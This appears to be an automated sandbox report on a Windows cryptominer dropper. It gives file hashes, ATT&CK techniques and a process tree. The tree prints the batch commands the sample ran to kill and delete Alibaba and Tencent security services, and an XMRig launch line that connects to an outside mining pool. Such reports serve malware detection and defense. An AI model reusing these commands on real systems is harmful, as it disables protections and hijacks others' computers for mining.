Analysis

  • max time kernel
    23s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    04-05-2021 15:01

General

  • Target

    70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe

  • Size

    569KB

  • MD5

    c85e27470e88ad0d0449ab68ef18d0a3

  • SHA1

    4791330c3acf353772c3d073cc52a619eb4cd7cc

  • SHA256

    70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f

  • SHA512

    39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner Payload 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Stops running service(s) 3 TTPs
  • Loads dropped DLL 2 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utility to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates processes with tasklist 1 TTPs 4 IoCs
  • Kills process with taskkill 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe
    "C:\Users\Admin\AppData\Local\Temp\70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\Windows\htttp.exe
      "C:\Windows\htttp.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1972
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ""C:\Users\Admin\AppData\Local\Temp\run.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1096
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq Ali_update.exe"
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1036
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq aliyun_assist_service.exe"
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:652
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq aliyun_assist_update.exe"
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1832
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist /FI " IMAGENAME eq aliyun_installer.exe"
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:1488
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM aliyun_assist_service.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1980
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM aliyun_assist_update.exe"
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1580
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM aliyun_installer.exe"
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1996
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM Ali_update.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:568
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AliHids.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1452
        • C:\Windows\SysWOW64\sc.exe
          sc stop "Alibaba Security Aegis Detect Service"
          4⤵
          PID:1376
        • C:\Windows\SysWOW64\sc.exe
          sc stop "Alibaba Security Aegis Update Service"
          4⤵
          PID:1868
        • C:\Windows\SysWOW64\sc.exe
          sc delete "Alibaba Security Aegis Detect Service"
          4⤵
          PID:1968
        • C:\Windows\SysWOW64\sc.exe
          sc delete "Alibaba Security Aegis Update Service"
          4⤵
          PID:1964
        • C:\Windows\SysWOW64\sc.exe
          sc stop "BaradAgentSvc"
          4⤵
          PID:1720
        • C:\Windows\SysWOW64\sc.exe
          sc stop "StargateSvc"
          4⤵
          PID:1816
        • C:\Windows\SysWOW64\sc.exe
          sc stop "QPCore"
          4⤵
          PID:1340
        • C:\Windows\SysWOW64\sc.exe
          sc delete "BaradAgentSvc"
          4⤵
          PID:1988
        • C:\Windows\SysWOW64\sc.exe
          sc delete "StargateSvc"
          4⤵
          PID:1036
        • C:\Windows\SysWOW64\sc.exe
          sc delete "QPCore"
          4⤵
          PID:1388
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QQProtect.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1676
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sgagent.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1600
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BaradAgent.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:960
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YDLive.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:568
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YDService.exe
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1328
      • C:\Users\Admin\AppData\Local\Temp\redis-server.exe
        "C:\Users\Admin\AppData\Local\Temp\redis-server.exe" -o pool.fuck-jp.ru:8888 --nicehash true
        3⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1604

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

  • Modify Existing Service 1 T1031
  • Registry Run Keys / Startup Folder 1 T1060

Defense Evasion

  • Impair Defenses 1 T1562
  • Modify Registry 1 T1112

Discovery

  • System Information Discovery 1 T1082
  • Process Discovery 1 T1057

Impact

  • Service Stop 1 T1489
Downloads

  • C:\Users\Admin\AppData\Local\Temp\redis-server.exe
    MD5
    0c4ae60bb07bd7c084ca66b844fa0b4b
    SHA1
    ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
    SHA256
    31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
    SHA512
    5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d

  • C:\Users\Admin\AppData\Local\Temp\run.bat
    MD5
    f1cc668d01eeb779b1fc1044541fc1d4
    SHA1
    45bd782881b31eb2868fc211b19af2cb627a9d0d
    SHA256
    62fdc9b8581a931ac987446ab4c8547bb9f94d9caf8e61c3d0d95ec033e73929
    SHA512
    293263607a850f2bb6873924b6606b83c7ea0dbd9fa07c0d8958be9e64aa1b27e24a0cf213b89906b3919c32da3c265d3ae9df07430ab4441b7289b3e935c33e

  • C:\Windows\htttp.exe
    MD5
    c85e27470e88ad0d0449ab68ef18d0a3
    SHA1
    4791330c3acf353772c3d073cc52a619eb4cd7cc
    SHA256
    70f512b436a0795fb3ae5c5c09e4a544d43d2c50e08c2f6ca797a4898a04193f
    SHA512
    39bdcba7169b7b78353453ebfc72a8604272433b9bf2d043a231bec175f73a11b77bc93bcb45b85207cbafcd5c50bfa61ee0bd89314229c9b21de3ce8594ab01

  • \Users\Admin\AppData\Local\Temp\redis-server.exe
    MD5
    0c4ae60bb07bd7c084ca66b844fa0b4b
    SHA1
    ff2dbcdc44b7192e26a2a2ec32eb90a105a0db80
    SHA256
    31cf37437a844eada2afd9c76a8f3b7f51f7b7d2e8bf87eea56beb5df6f1975e
    SHA512
    5dc775a7f7e38ab77b85cc5484c767d888ce30c2373a1df6f5a1d239c99d2513f72ff2810b44315c47eb945f5c13d80dbf073e971cde29bf4675a8c0d5ced74d

  • memory/568-96-0x0000000000000000-mapping.dmp
  • memory/568-74-0x0000000000000000-mapping.dmp
  • memory/652-67-0x0000000000000000-mapping.dmp
  • memory/960-95-0x0000000000000000-mapping.dmp
  • memory/1036-89-0x0000000000000000-mapping.dmp
  • memory/1036-66-0x0000000000000000-mapping.dmp
  • memory/1096-64-0x0000000000000000-mapping.dmp
  • memory/1328-97-0x0000000000000000-mapping.dmp
  • memory/1340-82-0x0000000000000000-mapping.dmp
  • memory/1376-76-0x0000000000000000-mapping.dmp
  • memory/1388-90-0x0000000000000000-mapping.dmp
  • memory/1452-75-0x0000000000000000-mapping.dmp
  • memory/1488-70-0x0000000000000000-mapping.dmp
  • memory/1580-72-0x0000000000000000-mapping.dmp
  • memory/1600-94-0x0000000000000000-mapping.dmp
  • memory/1604-93-0x00000000001F0000-0x0000000000210000-memory.dmp
    Filesize 128KB
  • memory/1604-92-0x000000013F870000-0x00000001407DA000-memory.dmp
    Filesize 15.4MB
  • memory/1604-98-0x0000000000550000-0x0000000000570000-memory.dmp
    Filesize 128KB
  • memory/1604-99-0x0000000000570000-0x0000000000590000-memory.dmp
    Filesize 128KB
  • memory/1604-84-0x0000000000000000-mapping.dmp
  • memory/1676-91-0x0000000000000000-mapping.dmp
  • memory/1688-60-0x0000000075011000-0x0000000075013000-memory.dmp
    Filesize 8KB
  • memory/1720-80-0x0000000000000000-mapping.dmp
  • memory/1816-81-0x0000000000000000-mapping.dmp
  • memory/1832-69-0x0000000000000000-mapping.dmp
  • memory/1868-77-0x0000000000000000-mapping.dmp
  • memory/1964-79-0x0000000000000000-mapping.dmp
  • memory/1968-78-0x0000000000000000-mapping.dmp
  • memory/1972-61-0x0000000000000000-mapping.dmp
  • memory/1980-71-0x0000000000000000-mapping.dmp
  • memory/1988-86-0x0000000000000000-mapping.dmp
  • memory/1996-73-0x0000000000000000-mapping.dmp